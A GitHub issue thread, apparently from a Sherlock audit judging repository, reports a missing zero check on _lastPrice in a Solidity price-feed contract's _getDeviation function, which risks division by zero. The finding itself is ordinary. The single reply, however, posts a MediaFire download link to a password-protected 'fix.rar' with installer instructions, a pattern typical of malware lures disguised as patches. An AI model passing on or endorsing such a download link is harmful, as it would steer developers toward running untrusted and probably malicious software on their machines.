### ISSUE TITLE
admin - Lack of Input Validation at _getDeviation function for CustomAggregatorV3CompatibleFeed contract

### ISSUE THREAD

**Issue by sherlock-admin4** [sherlock-audit/2024-08-midas-minter-redeemer-judging#8]
admin

Medium

# Lack of Input Validation at _getDeviation function for CustomAggregatorV3CompatibleFeed contract

### Summary

Link: https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/feeds/CustomAggregatorV3CompatibleFeed.sol#L231

The _getDeviation function calculates deviation based on the previous and new prices. However, it does not check whether _lastPrice is zero, which could lead to a division by zero. While the function attempts to address division by zero for _newPrice, it does not handle it comprehensively for _lastPrice.

### Root Cause

Lack of input validation.

### Impact

An attacker could attempt to manipulate _lastPrice to be zero or a small value, causing unexpected behavior.

### Mitigation

Add check for _lastPrice

**Comment by mengyanshou** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
